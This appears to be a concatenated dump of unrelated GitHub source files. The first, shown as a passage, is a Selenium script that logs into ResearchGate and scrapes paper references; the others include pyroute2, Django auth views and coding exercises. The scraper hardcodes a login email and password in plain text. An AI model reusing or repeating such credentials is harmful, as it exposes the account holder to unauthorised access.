prefs)\noptions.add_argument(\"start-maximized\")\noptions.add_argument(\"--window-size=1920,1080\")\noptions.add_argument(\"--disable-extensions\")\noptions.add_argument(\"--proxy-server='direct://'\")\noptions.add_argument(\"--proxy-bypass-list=*\")\noptions.add_argument(\"--start-maximized\")\noptions.add_argument('--disable-gpu')\noptions.add_argument('--disable-dev-shm-usage')\noptions.add_argument('--no-sandbox')\noptions.add_argument('--ignore-certificate-errors')\n\n\nPAPER1 = \"A Comprehensive Survey of Image-Based Food Recognition and Volume Estimation Methods for Dietary Assessment\"\nPAPER2 = \"Recommending Research Articles: A Multi-Level Chronological Learning-Based Approach Using Unsupervised Keyphrase Extraction and Lexical Similarity Calculation\"\nPAPER3 = \"PositionRank: An Unsupervised Approach to Keyphrase Extraction from Scholarly Documents\"\npaper = {\n\n \"name\": PAPER1,\n \"id\": uuid4()\n}\n\ndriver = webdriver.Edge(service=Service(\n EdgeChromiumDriverManager().install()), options=options)\n\ndriver.get('https://www.researchgate.net/')\n\n\ndriver.find_element(by=By.CSS_SELECTOR, value=\".index-header__log-in\").click()\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#input-login\").send_keys(\"ema.191902035@green.ac.bd\")\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#input-password\").send_keys(\"researchgate\")\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"button[type='submit']\").click()\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#header-search-action\").send_keys(paper['name'])\ndriver.find_element(by=By.CSS_SELECTOR,\n value=\"#header-search-action\").send_keys(Keys.ENTER)\nfirst_paper = None\n\ntry:\n first_paper = driver.find_element(by=By.XPATH,\n value=\"(//div[@class='search-box__result-item'])[1]\")\nexcept:\n print(\"Page not found\")\nif first_paper:\n first_paper.find_element(by=By.TAG_NAME, value=\"a\").click()\n\n paper_info_el = driver.find_element(by=By.XPATH,\n value=\"(//div[@class='content-grid__columns--narrow'])[1]\")\n\n paper_infos = paper_info_el.find_elements(\n by=By.CLASS_NAME, value=\"nova-legacy-o-stack__item\")\n\n try:\n ref_button = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH,\n \"(//button[@role='tab'])[5]\")))\n\n ref_button.click()\n\n print(ref_button.text)\n except:\n pass\n\n # Wait to load page\n sleep(5)\n # # Get scroll height\n last_height = driver.execute_script(\"return document.body.scrollHeight\")\n while True:\n # Scroll down to bottom\n driver.execute_script(\n \"window.scrollTo(0, document.body.scrollHeight);\")\n\n # Wait to load page\n sleep(3)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = driver.execute_script(\"return document.body.scrollHeight\")\n if new_height == last_height:\n break\n last_height = new_height\n\n showMoreFound = True\n while showMoreFound:\n try:\n showMore = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR,\n \"button[class='nova-legacy-c-button nova-legacy-c-button--align-center nova-legacy-c-button--radius-m nova-legacy-c-button--size-m nova-legacy-c-button--color-blue nova-legacy-c-button--theme-bare nova-legacy-c-button--width-full']\")))\n # print(showMore)\n if showMore:\n showMore.click()\n driver.implicitly_wait(3)\n else:\n showMoreFound = False\n except:\n showMoreFound = False\n\n sleep(1)\n # sections = driver.find_element(\n # by=By.CSS_SELECTOR, value=\"div[class='nova-legacy-o-stack nova-legacy-o-stack--gutter-xxxl nova-legacy-o-stack--spacing-xl 
nova-legacy-o-stack--show-divider']\")\n\n allRefs = driver.find_elements(\n By.XPATH, \"//div[@class='nova-legacy-o-stack__item']//div[@class='nova-legacy-o-stack nova-legacy-o-stack--gutter-s nova-legacy-o-stack--spacing-none nova-legacy-o-stack--no-gutter-outside']\")\n print(len(allRefs))\n items = []\n\n for ref in allRefs:\n i = ref.find_element(\n by=By.CLASS_NAME, value=\"nova-legacy-v-publication-item__body\")\n items.append(i)\n print()\n\n # missingBody = sections.find_elements(\n # by=By.XPATH, value='//div[@class=\"nova-legacy-e-text nova-legacy-e-text--size-m nova-legacy-e-text--family-sans-serif nova-legacy-e-text--spacing-none nova-legacy-e-text--color-inherit\"]/ancestor::div[@class=\"nova-legacy-o-stack__item\"]')\n # downBtn = sections.find_elements(\n # by=By.XPATH, value=\"//a[.//span[text()='Download']]\")\n # print(len(downBtn))\n\n\n# # //a[@class=\"nova-legacy-e-link nova-legacy-e-link--color-inherit nova-legacy-e-link--theme-bare\"]\n\n allRefData = []\n ss = set()\n\n types = ['Literature Review', 'Conference Paper', 'Article', 'Chapter']\n avoid = types + ['Full-text available', 'File available']\n for s in items:\n links = s.find_elements(by=By.TAG_NAME, value=\"a\")\n # print(link.text)\n paper_info = {\n # \"name\": \"\",\n # \"type\": \"\",\n \"published_date\": \"\",\n # \"publisher\": \"\",\n # \"id\": uuid4(),\n # \"paper_link\": \"\",\n # \"download_link\": \"\",\n\n }\n\n # for link in links:\n # if 'https://www.researchgate.net/publication/' in link.get_attribute('href'):\n # if link.text not in avoid:\n # paper_info['name'] = link.text\n # paper_info['type'] = link.text\n # paper_info['paper_link'] = link.get_attribute('href')\n # elif link.text in types:\n # paper_info['type'] = link.text\n\n time = s.find_element(By.XPATH, '//time')\n paper_info['date'] = time.get_attribute('datetime')\n # print(time.text)\n # print(time.get_attribute('datetime'))\n\n allRefData.append(paper_info)\n\n # for i, d in enumerate(allRefs):\n # try:\n # a = d.find_element(\n # By.XPATH, \".//a[.//span[text()='Download']]\")\n # if a:\n # allRefData[i]['download_link'] = a.get_attribute('href')\n # print(i)\n # # print(len(a))\n # print()\n # except:\n # print(f\"not found {i}\")\n\n with open('write.txt', 'w') as f:\n for p in allRefData:\n # f.write(str(p['name']) + '\\n')\n # f.write(str(p['type']) + '\\n')\n # f.write(str(p['paper_link']) + '\\n')\n # f.write(str(p['download_link']) + '\\n')\n f.write(str(p['published_date']) + '\\n')\n # f.write(str(p['publisher']) + '\\n')\n f.write('\\n')\n# print(ss)\n# print(len(ss))\n\n# print(\"Done\")\n# if not args.h:\n# sleep(50)\n\n\"\"\"\nhttps://stackoverflow.com/questions/8577636/select-parent-element-of-known-element-in-selenium\n\n\n\n\n\nNow that you need to select parent tag 'a' based on text, then use\n\ndriver.find_element(By.XPATH, \"//button[.//span[text()='Close']]\")\n\nhttps://spltech.co.uk/how-to-find-the-parent-element-in-a-page-using-python-selenium-webdriver/\n\n\n
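A minimal sketch (hypothetical locators, not taken from the pages above) of stepping from a matched child element up to its parent or a chosen ancestor with relative XPath:\n\nchild = driver.find_element(By.XPATH, \"//span[text()='Close']\")\nparent = child.find_element(By.XPATH, './..')            # immediate parent of the span\ncard = child.find_element(By.XPATH, 'ancestor::div[1]')  # nearest enclosing div\n\n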
(example HTML from the tutorial omitted here: the markup was garbled in extraction and only three nested \"Hello World\" text nodes survived)
\n\n \"\"\"\n","repo_name":"dev-SR/RefScrapper","sub_path":"raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":9273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9415294736","text":"import inspect\nimport logging\nimport queue\nimport threading\nimport time\nimport traceback\nfrom functools import partial\n\nfrom pyroute2 import config\n\nfrom . import schema\nfrom .events import (\n DBMExitException,\n InvalidateHandlerException,\n RescheduleException,\n ShutdownException,\n)\nfrom .messages import cmsg, cmsg_event, cmsg_failed, cmsg_sstart\n\nlog = logging.getLogger(__name__)\n\n\ndef Events(*argv):\n for sequence in argv:\n if sequence is not None:\n for item in sequence:\n yield item\n\n\nclass NDBConfig(dict):\n def __init__(self, task_manager):\n self.task_manager = task_manager\n\n def __getitem__(self, key):\n return self.task_manager.config_get(key)\n\n def __setitem__(self, key, value):\n return self.task_manager.config_set(key, value)\n\n def __delitem__(self, key):\n return self.task_manager.config_del(key)\n\n def keys(self):\n return self.task_manager.config_keys()\n\n def items(self):\n return self.task_manager.config_items()\n\n def values(self):\n return self.task_manager.config_values()\n\n\nclass TaskManager:\n def __init__(self, ndb):\n self.ndb = ndb\n self.log = ndb.log\n self.event_map = {}\n self.event_queue = ndb._event_queue\n self.thread = None\n self.ctime = self.gctime = time.time()\n\n def register_handler(self, event, handler):\n if event not in self.event_map:\n self.event_map[event] = []\n self.event_map[event].append(handler)\n\n def unregister_handler(self, event, handler):\n self.event_map[event].remove(handler)\n\n def default_handler(self, target, event):\n if isinstance(getattr(event, 'payload', None), Exception):\n raise event.payload\n log.debug('unsupported event ignored: %s' % type(event))\n\n def check_sources_started(self, _locals, target, event):\n _locals['countdown'] -= 1\n if _locals['countdown'] == 0:\n self.ndb._dbm_ready.set()\n\n def wrap_method(self, method):\n #\n # this wrapper will be published in the DBM thread\n #\n def _do_local_generator(target, request):\n try:\n for item in method(*request.argv, **request.kwarg):\n request.response.put(item)\n request.response.put(StopIteration())\n except Exception as e:\n request.response.put(e)\n\n def _do_local_single(target, request):\n try:\n (request.response.put(method(*request.argv, **request.kwarg)))\n except Exception as e:\n (request.response.put(e))\n\n #\n # this class will be used to map the requests\n #\n class cmsg_req(cmsg):\n def __init__(self, response, *argv, **kwarg):\n self['header'] = {'target': None}\n self.response = response\n self.argv = argv\n self.kwarg = kwarg\n\n #\n # this method will proxy the original one\n #\n def _do_dispatch_generator(self, *argv, **kwarg):\n if self.thread == id(threading.current_thread()):\n # same thread, run method locally\n for item in method(*argv, **kwarg):\n yield item\n else:\n # another thread, run via message bus\n response = queue.Queue()\n request = cmsg_req(response, *argv, **kwarg)\n self.event_queue.put((request,))\n while True:\n item = response.get()\n if isinstance(item, StopIteration):\n return\n elif isinstance(item, Exception):\n raise item\n else:\n yield item\n\n def _do_dispatch_single(self, *argv, **kwarg):\n if self.thread == id(threading.current_thread()):\n # same thread, run method locally\n return method(*argv, **kwarg)\n else:\n # 
another thread, run via message bus\n response = queue.Queue(maxsize=1)\n request = cmsg_req(response, *argv, **kwarg)\n self.event_queue.put((request,))\n ret = response.get()\n if isinstance(ret, Exception):\n raise ret\n else:\n return ret\n\n #\n # return the method spec to be announced\n #\n handler = _do_local_single\n proxy = _do_dispatch_single\n if inspect.isgeneratorfunction(method):\n handler = _do_local_generator\n proxy = _do_dispatch_generator\n return (cmsg_req, handler, proxy)\n\n def register_api(self, api_obj, prefix=''):\n for name in dir(api_obj):\n method = getattr(api_obj, name, None)\n if hasattr(method, 'publish'):\n if isinstance(method.publish, str):\n name = method.publish\n name = f'{prefix}{name}'\n event, handler, proxy = self.wrap_method(method)\n setattr(self, name, partial(proxy, self))\n self.event_map[event] = [handler]\n\n def run(self):\n _locals = {'countdown': len(self.ndb._nl)}\n self.thread = id(threading.current_thread())\n\n # init the events map\n event_map = {\n cmsg_event: [lambda t, x: x.payload.set()],\n cmsg_failed: [lambda t, x: (self.ndb.schema.mark(t, 1))],\n cmsg_sstart: [partial(self.check_sources_started, _locals)],\n }\n self.event_map = event_map\n\n try:\n self.ndb.schema = schema.DBSchema(\n self.ndb.config,\n self.ndb.sources,\n self.event_map,\n self.log.channel('schema'),\n )\n self.register_api(self.ndb.schema, 'db_')\n self.register_api(self.ndb.schema.config, 'config_')\n self.ndb.bonfig = NDBConfig(self)\n\n except Exception as e:\n self.ndb._dbm_error = e\n self.ndb._dbm_ready.set()\n return\n\n for spec in self.ndb._nl:\n spec['event'] = None\n self.ndb.sources.add(**spec)\n\n for event, handlers in self.ndb.schema.event_map.items():\n for handler in handlers:\n self.register_handler(event, handler)\n\n stop = False\n source = None\n reschedule = []\n while not stop:\n source, events = self.event_queue.get()\n events = Events(events, reschedule)\n reschedule = []\n try:\n for event in events:\n handlers = event_map.get(\n event.__class__, [self.default_handler]\n )\n\n for handler in tuple(handlers):\n try:\n target = event['header']['target']\n handler(target, event)\n except RescheduleException:\n if 'rcounter' not in event['header']:\n event['header']['rcounter'] = 0\n if event['header']['rcounter'] < 3:\n event['header']['rcounter'] += 1\n self.log.debug('reschedule %s' % (event,))\n reschedule.append(event)\n else:\n self.log.error('drop %s' % (event,))\n except InvalidateHandlerException:\n try:\n handlers.remove(handler)\n except Exception:\n self.log.error(\n 'could not invalidate '\n 'event handler:\\n%s'\n % traceback.format_exc()\n )\n except ShutdownException:\n stop = True\n break\n except DBMExitException:\n return\n except Exception:\n self.log.error(\n 'could not load event:\\n%s\\n%s'\n % (event, traceback.format_exc())\n )\n if time.time() - self.gctime > config.gc_timeout:\n self.gctime = time.time()\n except Exception as e:\n self.log.error(f'exception <{e}> in source {source}')\n # restart the target\n try:\n self.log.debug(f'requesting source {source} restart')\n self.ndb.sources[source].state.set('restart')\n except KeyError:\n self.log.debug(f'key error for {source}')\n pass\n\n # release all the sources\n for target in tuple(self.ndb.sources.cache):\n source = self.ndb.sources.remove(target, sync=False)\n if source is not None and source.th is not None:\n self.log.debug(f'closing source {source}')\n source.close()\n if self.ndb.schema.config['db_cleanup']:\n self.log.debug('flush DB for the target 
%s' % target)\n self.ndb.schema.flush(target)\n else:\n self.log.debug('leave DB for debug')\n\n # close the database\n self.ndb.schema.commit()\n self.ndb.schema.close()\n\n # close the logging\n for handler in self.log.logger.handlers:\n handler.close()\n","repo_name":"svinota/pyroute2","sub_path":"pyroute2/ndb/task_manager.py","file_name":"task_manager.py","file_ext":"py","file_size_in_byte":9808,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"} +{"seq_id":"26428189037","text":"import sqlite3\nimport datetime\nvisits_db = '__HOME__/dat/time_example2.db'\n \ndef request_handler(request):\n conn = sqlite3.connect(visits_db) # connect to that database (will create if it doesn't already exist)\n c = conn.cursor() # make cursor into database (allows us to execute commands)\n outs = \"\"\n c.execute('''CREATE TABLE IF NOT EXISTS dated_table (user text,favorite_number int, timing timestamp);''') # run a CREATE TABLE command\n fifteen_minutes_ago = datetime.datetime.now()- datetime.timedelta(minutes = 15) # create time for fifteen minutes ago!\n c.execute('''INSERT into dated_table VALUES (?,?,?);''', ('joe','5',datetime.datetime.now()))\n things = c.execute('''SELECT * FROM dated_table WHERE timing > ? ORDER BY timing ASC;''',(fifteen_minutes_ago,)).fetchall()\n outs = \"Things:\\n\"\n for x in things:\n outs+=str(x)+\"\\n\"\n conn.commit() # commit commands\n conn.close() # close connection to database\n return outs","repo_name":"mtrejo0/SchoolWork","sub_path":"6.08/labs/lab4a/serverDat.py","file_name":"serverDat.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27499427738","text":"import sys\n\nsys.stdin = open('input.txt')\n\ninput = sys.stdin.readline\nN = int(input())\narr = []\n\nfor _ in range(N):\n arr.append(int(input()))\n\nminV = sys.maxsize\nmm = min(arr)\nfor i in arr:\n if i == mm:\n continue\n else:\n minV = min(i, minV)\nans = []\nfor i in range(2, minV):\n r = arr[0] % i\n for j in range(1, N):\n if r != (arr[j] % i):\n break\n else:\n ans.append(i)\nprint(*ans)\n \n\n ","repo_name":"khjeon5328/today_algorithm","sub_path":"2021/2021.04월/29일/2981.py","file_name":"2981.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21958592708","text":"N = int(input())\nM = int(input())\n\na = [True] * (M+1)\na[1] = False\nm = int( (M+1) ** 0.5)\nsum = 0\nmin = 0\n\nfor i in range(2, m+1):\n if a[i] == True:\n for j in range(i+i, M+1, i):\n a[j] = False\n\nfor i in range(N,M+1):\n if a[i] == True:\n sum += i\n\n if a[i] == True and min == 0:\n min = i\n\nif min == 0:\n print(-1)\n\nelse :\n print(sum)\n print(min)","repo_name":"dujong/Backjoon","sub_path":"기본수학2/소수.py","file_name":"소수.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13405299238","text":"\nimport os\nimport logging\nimport tempfile\nimport traceback\nfrom functools import partial\n\nimport sublime\nimport sublime_plugin\n\nfrom anaconda_rust.anaconda_lib.anaconda_plugin import is_code\nfrom anaconda_rust.anaconda_lib.anaconda_plugin import ProgressBar\nfrom anaconda_rust.anaconda_lib.anaconda_plugin import Worker, Callback\nfrom anaconda_rust.anaconda_lib.helpers import get_settings, get_window_view\nfrom anaconda_rust.anaconda_lib.helpers import 
file_directory\n\n\nclass AnacondaRustFmt(sublime_plugin.TextCommand):\n \"\"\"Execute rustfmt command in a file\n \"\"\"\n\n data = None\n\n def run(self, edit):\n\n if self.data is not None:\n self.update_buffer(edit)\n return\n\n try:\n messages = {\n 'start': 'Auto formatting file...',\n 'end': 'done!',\n 'fail': 'The auto formatting failed!',\n 'timeout': 'The auto formatiing timed out!'\n }\n self.pbar = ProgressBar(messages)\n self.pbar.start()\n self.view.set_read_only(True)\n\n rustfmt = get_settings(\n self.view, 'rustfmt_binary_path', 'rustfmt'\n )\n if rustfmt == '':\n rustfmt = 'rustfmt'\n\n self.code = self.view.substr(\n sublime.Region(0, self.view.size())\n )\n\n # the JonServer deletes the temp file so we don't worry\n fd, path = tempfile.mkstemp(suffix=\".rs\", dir=file_directory())\n with os.fdopen(fd, \"w\", encoding=\"utf-8\") as tmp:\n tmp.write(self.code)\n\n config_path = get_settings(self.view, 'rust_rustfmt_config_path', '')\n\n data = {\n 'vid': self.view.id(),\n 'filename': path,\n 'settings': {\n 'rustfmt_binary_path': rustfmt,\n 'config_path': config_path\n },\n 'method': 'format',\n 'handler': 'rustfmt'\n }\n timeout = get_settings(self.view, 'rust_rustfmt_timeout', 1)\n\n callback = Callback(timeout=timeout)\n callback.on(success=self.prepare_data)\n callback.on(error=self.on_failure)\n callback.on(timeout=partial(self.clean_tmp_file, path))\n\n Worker().execute(callback, **data)\n except:\n logging.error(traceback.format_exc())\n\n def is_enabled(self):\n \"\"\"Determine if this command is enabled or not\n \"\"\"\n\n return is_code(self.view, lang='rust', ignore_comments=True)\n\n def on_failure(self, *args, **kwargs):\n \"\"\"Called when callback return a failure or times out\n \"\"\"\n\n self.pbar.terminate(status=self.pbar.Status.FAILURE)\n self.view.set_read_only(False)\n print(args[0]['error'])\n\n def prepare_data(self, data):\n \"\"\"Prepare the returned data to overwrite our buffer\n \"\"\"\n\n self.data = data\n self.pbar.terminate()\n self.view.set_read_only(False)\n self.view.run_command('anaconda_rust_fmt')\n\n def update_buffer(self, edit):\n \"\"\"Update and reload the buffer\n \"\"\"\n\n view = get_window_view(self.data['vid'])\n output = self.sanitize(self.data.get('output'))\n if output and self.sanitize(self.code) != output:\n region = sublime.Region(0, view.size())\n view.replace(edit, region, self.data.get('output'))\n if get_settings(view, 'rust_format_on_save'):\n sublime.set_timeout(lambda: view.run_command('save'), 0)\n\n self.data = None\n self.code = None\n\n def sanitize(self, text):\n \"\"\"Remove blank lines from text and trim it\n \"\"\"\n\n return os.linesep.join([s for s in text.splitlines() if s]).strip()\n\n def clean_tmp_file(self, path):\n \"\"\"Clean the tmp file at timeout\n \"\"\"\n\n try:\n os.remove(path)\n except:\n pass\n\n def _get_working_directory(self):\n \"\"\"Return back the project file directory if any or current file one\n \"\"\"\n\n pfilename = sublime.active_window().project_file_name()\n if pfilename is not None:\n return os.path.dirname(pfilename)\n\n return os.path.dirname(self.view.file_name())\n","repo_name":"DamnWidget/anaconda_rust","sub_path":"commands/rustfmt.py","file_name":"rustfmt.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"61"} +{"seq_id":"36064928366","text":"l = [10,15,3,7]\nk = 17\n\nfor i in l:\n for j in l:\n if (i + j) == k:\n break\nprint(i,j)\n\n# See if there are any other 
solutions\n\n","repo_name":"chethanbr86/Python_programs","sub_path":"daily_coding/dc1_sumofdigits.py","file_name":"dc1_sumofdigits.py","file_ext":"py","file_size_in_byte":147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32463537596","text":"# This will be the class containing the rounds of each game\nfrom game_files.roster_files.random_player_generator import *\n\nNum_of_players = 538\n\n\nclass Round:\n \"\"\"\n Each round of a game, where there is a correct NBA player and the player has\n 5 tries to get each player. With each guess, the player will be given\n information based on their last guess. If the guessed NBA player plays in\n the same team, has the same height, or has the same weight, the player will\n be told that the correct component is green. if the guessed NBA player plays\n in the same division, is within 2 inches of the correct player, or is within\n 15 pounds, then they will be told that they are close to the answer with\n the close component being yellow\n\n === Attributes ===\n correct_player: The correct NBA player that the player tries to guess\n \"\"\"\n correct_player: list\n\n def __init__(self):\n self.correct_player = PlayerGenerator()\n\n def name_correctness(self, guess: str) -> bool:\n \"\"\"\n Returns whether or not the guess is correct\n :param guess: The guess that the player provides\n :return: Whether or not the guess is correct or not\n \"\"\"\n if guess == self.correct_player:\n return True\n return False\n\n def height_guess(self, guess: str) -> str:\n \"\"\"\n Returns \"correct\" if the height of the guessed player is the same as the\n correct_player. Returns \"close\" if the height of the guessed player is\n 2 inches off of the correct_player. Returns \"incorrect\" if the height of\n the guessed player is off by more than 2 inches.\n :param guess: The guess that the player provides\n \"\"\"\n guess_player = PlayerFinder(guess)\n if guess_player[2] == self.correct_player[2]:\n return \"correct\"\n elif abs(int(guess_player[2][2]) - int(self.correct_player[2][2])) < 3:\n return \"close\"\n else:\n return \"incorrect\"\n\n def position_guess(self, guess: str) -> str:\n \"\"\"\n Return \"correct\" if the position of the guessed player is the same as\n the correct_player. Returns \"close\" if either the guessed player or the\n correct player or both have two positions and they both have one\n position in common. 
Returns \"incorrect\" if the position of\n the guessed player is wrong.\n :param guess: The name of the player\n \"\"\"\n guess_player = PlayerFinder(guess)\n if guess_player[1] == self.correct_player[1]:\n return \"correct\"\n elif len(guess_player[1]) > 1 and len(self.correct_player[1]) == 1:\n if self.correct_player[1] == guess_player[1][0]:\n return \"close\"\n return \"incorrect\"\n elif len(self.correct_player[1]) > 1 and len(guess_player[1]) == 1:\n if self.correct_player[1][0] == guess_player[1]:\n return \"close\"\n elif self.correct_player[1][2] == guess_player[1]:\n return \"close\"\n return \"incorrect\"\n elif len(guess_player[1]) > 1 and len(self.correct_player[1]) > 1:\n if self.correct_player[1][0] == guess_player[1][0] or \\\n self.correct_player[1][2] == guess_player[1][0] or \\\n self.correct_player[1][0] == guess_player[1][2] or \\\n self.correct_player[1][2] == guess_player[1][2]:\n return \"close\"\n return \"incorrect\"\n\n def weight_guess(self, guess: str) -> str:\n \"\"\"\n Returns \"correct\" if the weight of the guessed player is the same as the\n correct_player. Returns \"close\" if the weight of the guessed player is\n plus or minus 10 pounds of the correct_player. Returns \"incorrect\" if\n the weight is off by more than 10 pounds.\n :param guess: the name of the player\n \"\"\"\n guess_player = PlayerFinder(guess)\n guess_weight = int(guess_player[3])\n correct_weight = int(self.correct_player[3])\n if guess_weight == correct_weight:\n return \"correct\"\n elif abs(guess_weight - correct_weight) <= 10:\n return \"close\"\n return \"incorrect\"\n\n\nif __name__ == '__main__':\n player = Round()\n","repo_name":"JMH-0402/Poeltl_Duplicate","sub_path":"game_files/round.py","file_name":"round.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6285982832","text":"from rest_framework.viewsets import ModelViewSet\nfrom django.contrib.auth import authenticate, login, logout, get_user_model\nfrom django.contrib.auth.models import Group, Permission\nfrom .models import User\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .schemas import LoginSchema\nfrom rest_framework.permissions import AllowAny\nfrom .serializers import AdminSerializer,CashierSerializer, GroupSerializer, LoginSerializer\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\nclass GroupViewSet(ModelViewSet):\n\n queryset = Group.objects.all()\n serializer_class = GroupSerializer\n\n def create(self, request, args, *kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({\n 'status': 'Successful'\n }, status=status.HTTP_201_CREATED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n\nclass AdminViewSet(ModelViewSet):\n \n def get_queryset(self):\n return get_user_model().objects.filter(groups__name='adm')\n serializer_class = AdminSerializer \n\n def create(self, request, args, *kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({\n 'status': 'Successful'\n }, status=status.HTTP_201_CREATED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in 
default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n\nclass CashierViewSet(ModelViewSet):\n permission_classes = (AllowAny,)\n\n def get_queryset(self):\n return get_user_model().objects.filter(groups__name='csh')\n serializer_class = CashierSerializer\n\n def create(self, request, *kwargs):\n serializer = self.get_serializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({\n 'status': 'Successful'\n }, status=status.HTTP_201_CREATED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n\nclass LoginView(APIView):\n schema = LoginSchema\n permission_classes = (AllowAny,)\n\n def post(self, request): \n serializer = LoginSerializer(data=request.data)\n if serializer.is_valid():\n email = serializer.validated_data[\"email\"]\n password = serializer.validated_data['password']\n try:\n user = User.objects.get(email=email)\n if user.check_password(password):\n if user.is_active:\n login(request, user)\n\n # return Response(LoginSerializer(user).data, status=status.HTTP_200_OK)\n return Response({\"email\":email,\n \"username\":user.username,\n \"access_token\": str(RefreshToken.for_user(user).access_token)\n # \"refresh_token\":str(RefreshToken.for_user(user))\n }\n , status=status.HTTP_200_OK)\n\n else:\n return Response({\n \"code\": 110,\n \"message\": \"unverified account\",\n \"resolve\": \"please verify your account\"\n }, status=status.HTTP_401_UNAUTHORIZED)\n else:\n return Response({\n \"code\": 120,\n \"message\": \"incorect password\",\n \"resolve\": \"The password does not match with the email\"\n }, status=status.HTTP_401_UNAUTHORIZED)\n except User.DoesNotExist:\n return Response({\n \"code\": 120,\n \"message\": \"user does not exist\",\n \"resolve\": \"There's no account matching this email\"\n }, status=status.HTTP_401_UNAUTHORIZED)\n else:\n default_errors = serializer.errors\n new_error = {}\n for field_name, field_errors in default_errors.items():\n new_error[field_name] = field_errors[0]\n return Response(new_error, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"suavelad/receipt_api_app","sub_path":"auth_api/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22605900727","text":"from newsrc import dataloader\nfrom newsrc import glm\n\n\nif __name__ == '__main__':\n train_path = './src/train.conll'\n dev_path = './src/dev.conll'\n\n train_dataset = dataloader.DataLoader(train_path, batch_size=10)\n print(train_dataset)\n dev_dataset = dataloader.DataLoader(dev_path, batch_size=10)\n print(dev_dataset)\n print(train_dataset.tag_dict)\n # print(train_dataset.sent_word_list[0])\n # print(train_dataset.sent_tag_list[0])\n\n\n myglm = glm.GlobalLinearModel(train_dataset, dev_dataset)\n # print(myglm.epsilon)\n # print(myglm.tag_dict)\n myglm.online_training(1)","repo_name":"guangyuli-uoe/sulzh","sub_path":"global_linear/t4.py","file_name":"t4.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23573345901","text":"#!/usr/bin/env python3\nimport heapq\n\nclass ConsecStalls:\n StallCounter = 0\n def __init__(self, length, num):\n self.length = length\n 
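# 'num' counts how many stall runs of this exact length exist; equal-length runs are merged in the heap.\n        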
self.num = num\n self.unique = ConsecStalls.StallCounter\n ConsecStalls.StallCounter += 1\n\n def create_heap_element(self):\n return (-1 * self.length, self.unique, self)\n\nclass Instance:\n def __init__(self, name, N, K):\n self.name = name\n initial_stalls = ConsecStalls(N, 1)\n self.heap = [initial_stalls.create_heap_element()]\n heapq.heapify(self.heap)\n self.remaining = K\n self.maxLs = None\n self.minLs = None\n self.final_broken_block = None\n\n def solve(self):\n enough_breaking_up = False\n while not enough_breaking_up:\n enough_breaking_up = self.work_through_heap()\n self.last_placement_found()\n\n def work_through_heap(self):\n #print('\\nREMAINING:', self.remaining)\n #self.dump_heap()\n maximum = self.get_largest_element()\n\n enough_breaking_up = True\n if not self.all_get_assigned(maximum):\n self.remaining -= maximum.num\n if self.remaining < 0:\n raise ValueError('Too many assigned')\n elif self.remaining > 0:\n new_elements = self.split_maximum(maximum)\n self.push_stalls_to_heap(new_elements)\n enough_breaking_up = False\n if enough_breaking_up:\n self.final_broken_block = maximum\n return enough_breaking_up\n\n def dump_heap(self):\n print('DUMPING HEAP / LENGTH: ', len(self.heap))\n for idx, uniq, val in self.heap:\n print((val.length, val.num))\n\n def get_largest_element(self):\n if not self.heap:\n raise ValueError('Expected K < N')\n maximum = self.aggregate_maximal_values()\n return maximum\n\n def aggregate_maximal_values(self):\n maximum = self.pop_from_heap()\n while self.heap:\n candidate_maximum = self.pop_from_heap()\n if maximum.length == candidate_maximum.length:\n maximum.num += candidate_maximum.num\n else:\n self.single_safe_push(candidate_maximum)\n break\n return maximum\n\n def pop_from_heap(self):\n return heapq.heappop(self.heap)[2]\n\n def all_get_assigned(self, maximum):\n return maximum.num > self.remaining\n\n def split_maximum(self, maximum):\n maxlength = maximum.length\n if maxlength == 1:\n new_elements = []\n elif maxlength == 2:\n new_elements = [ConsecStalls(1, maximum.num)]\n elif (maxlength - 1) % 2 == 0:\n new_elements = [ConsecStalls((maxlength - 1) // 2, maximum.num * 2)]\n else:\n new_elements = [ConsecStalls((maxlength - 1)// 